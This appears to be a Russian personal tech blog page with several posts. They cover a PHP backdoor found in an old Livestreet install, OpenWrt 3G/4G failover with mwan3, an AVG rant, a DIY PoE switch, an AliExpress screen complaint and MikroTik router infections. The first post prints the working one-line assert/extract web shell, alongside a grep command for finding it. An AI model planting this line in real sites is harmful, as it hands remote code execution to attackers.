Старая уязвимость assert(stripslashes

WEB
В старом движке Livestreet нашёл давнюю уязвимость которая откуда-то взялаь и очень давно лежала в папке cache.
Но какой-то злоумышленник умудрился ей воспользоваться!
Выглядит как обычный php файл с содержанием типа

<?php extract($_REQUEST) && @assert(stripslashes($not)) && exit;


для поиска остальных фалов с подобным кодом использую команду
grep -r "assert(stripslashes" /srv/www/


Кстати из-за этой уязвимости начали находиться ЭЛЬФЫ (ELF).
В памяти сидят то удаляем их и снимаем процесс

Резервный 3G 4G канал для OPENWRT

Интернет
модули
usb-modeswitch
kmod-usb-net-cdc-ether

Существуют такие моменты когда постоянный доступ к сети Интернет просто необходим, например для платёжных терминалов, ведь клиент всегда прав, а если он неможет оплатить картой то это уже беда, клиент потерян, негатив!
Для поддержания доступа к сети Интертет обычно используют резервный канал. Я использую как резервный мобильный Интернет через 3G-4G свисток) Обычный роутер с неофициальной прошивкой OPENWRT.
Можно было бы написать скрипт проверки доступности каналов, но проще использовать готовый вариант под названием mwan3
mwan3 буду ставить для ОПЕНВРТ 15.05.1
opkg update
opkg install ip iptables-mod-conntrack-extra iptables-mod-ipopt
opkg install mwan3_1.2-17_all.ipk

Installing mwan3 (1.6-2) to root…
Downloading downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/packages/mwan3_1.6-2_all.ipk.
Installing ip (4.0.0-1) to root…
Downloading downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/base/ip_4.0.0-1_ar71xx.ipk.
Installing ipset (6.24-1) to root…
Downloading downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/base/ipset_6.24-1_ar71xx.ipk.
Installing kmod-ipt-ipset (3.18.23-1) to root…
Downloading downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/base/kmod-ipt-ipset_3.18.23-1_ar71xx.ipk.
Installing kmod-nfnetlink (3.18.23-1) to root…
Downloading downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/base/kmod-nfnetlink_3.18.23-1_ar71xx.ipk.
Installing libmnl (1.0.3-2) to root…
Downloading downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/base/libmnl_1.0.3-2_ar71xx.ipk.
Installing iptables-mod-conntrack-extra (1.4.21-1) to root…
Downloading downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/base/iptables-mod-conntrack-extra_1.4.21-1_ar71xx.ipk.
Installing kmod-ipt-conntrack-extra (3.18.23-1) to root…
Downloading downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/base/kmod-ipt-conntrack-extra_3.18.23-1_ar71xx.ipk.
Installing iptables-mod-ipopt (1.4.21-1) to root…
Downloading downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/base/iptables-mod-ipopt_1.4.21-1_ar71xx.ipk.
Installing kmod-ipt-ipopt (3.18.23-1) to root…
Downloading downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/base/kmod-ipt-ipopt_3.18.23-1_ar71xx.ipk.
Configuring ip.
Configuring kmod-nfnetlink.
Configuring libmnl.
Configuring kmod-ipt-conntrack-extra.
Configuring kmod-ipt-ipopt.
Configuring iptables-mod-ipopt.
Configuring kmod-ipt-ipset.
Configuring ipset.
Configuring iptables-mod-conntrack-extra.
Configuring mwan3.

luci-app-mwan3

Installing luci-app-mwan3 (1.4-3) to root…
Downloading downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/packages/luci-app-mwan3_1.4-3_all.ipk.
Configuring luci-app-mwan3.

Для прохождения трафика PPTP установить kmod-nf-nathelper-extra
Для того чтобы появился в интрефейсах ВПН ppp-mod-pptp

Правда и лож антивируса AVG (Мифы антивируса)

Интернет
Установил бесплатный антивирус AVG ПК.
Потестировал, постоянно вылазит всякая хрень, то пытаются оптимизировать то усилить защиту сообщения на дурачка,

ЗАДАЛБАЛ ЭТОТ AVG.

Вдруг откуда не возьмись появилась очередная утка от этого антивируса AVG.
Явно враньё, AVG Вы возможно считаете всех дураками?
Да и написано неграмотно — просто отвратительно.
Собственно предупреждение
Найдены 4 проблемы с конфиденциальностью
Как AVG пудрит голову и враньё

Читать дальше

псевдо POE свитч своими руками (самодельный poe коммутатор)

СХЕМЫ
Для питания одной IP камеры по одному проводу требуется POE адаптер.
А ели камер более чем одна? Кучу адаптеров? Да ещё соединять через коммутатор кучу проводов и блоков питания.
Решено сделать самодельный коммутатор с питанием IP камер в стиле аля POE.
Со стороны камеры я просто подключусь к синей и коричневой паре на + -. Сама по себе камера с POE может даже не стартанёт.
PoE расшифровывается как Power over Ethernet — технология, позволяющая передавать удалённому устройству электрическую энергию вместе с данными через стандартную витую пару в сети Ethernet.
Читать дальше

Экран для samsung Galaxy A7 2016 SM-A710F от Shop4232010 Store

Заказывал экран для замены в телефоне Samsung SM-A710F

С заказами неоригинальных экранов с EBAY проблем не возникало, пришёл экран с тачскрином, поменял за 10 минут. От оригинала не отличить.

НО!

Спустя пол года заказал с алиэкспресс в магазине Shop4232010 Store
Не обратил внимание на рейтинг магазина,а зря!
магазин на али рейтинг отстой
Собственно сам отзыв о покупке:
Экран пришёл с пластмассовой рамкой которая устанавливается в телефон заместо родной металлической рамки.
Рамка на несколько миллиметров выступает за пределы самого телефона. Дисплей намного толще оригинала, в родную рамку не вклеивается. Сразу видна некачественная подделка.
Для установки экрана потребовались усилия и телефон Galaxy A7 превратился в китайскую некачественную подделку.
Но это ладно.
Первым делом проверил работоспособность экрана Galaxy A7.
Всё было в защитных плёнках, аппарат включился.
Установил эту безобразную подделку вместе с пластиковой рамкой и какой-то прокладкой под кнопку.
Собрал смартфон. Включил — работает.
Отрываю защитную плёнку, проверяю тачскрин, вожу пальцами и вижу что экран БРАКОВАННЫЙ.
фото брака  Galaxy A7 экрана тачскрин с алиэкспресс спор провален
Какая-то полоса сливается с отпечатками от рук, а какая-то нет, вобщем полный брак.
На солнце в бракованную часть ничего не видно.
Определился брак после отклеивания защитной плёнки. Расклеить аппарат без повреждения стекла и отправки назад невозможно. Соответственно спор отвратительный магазин отверг прикидываясь дурачком на пару с алиэкспресс. Никакие доводы не работали с моей стороны. При всём при этом за данный брак я просил только 30% цены экрана. Очень долго отвечал Shop4232010 Store, специально тянул и писал одинаковые сообщения. Магазин Shop4232010 Store даже в свои доказательства загрузил видео длительностью в 0 секунд.
Теперь аппарат стал отвратительно выглядеть. Лучше бы работал дальше с треснутым тачскрином.
фото брака  Galaxy A7 экрана тачскрин с алиэкспресс спор провален
При небольшом надавливании на экран появляются артефакты да и без надавливания виден брак- синее неисчезающее пятно.!


НЕ ПОКУПАЙТЕ У Shop4232010 Store
Да и вапще алиэкспресс стал отвратительным!

на 1 августа 2018 Более 200 000 маршрутизаторов MikroTik заражены

Интернет
Сразу несколько ИБ-специалистов и компаний зафиксировали волну атак, направленную против маршрутизаторов MikroTik по всему миру. Первым на происходящее обратил внимание бразильский исследователь, известный под ником MalwareHunterBR.
микротик взломан майнинг
Читать дальше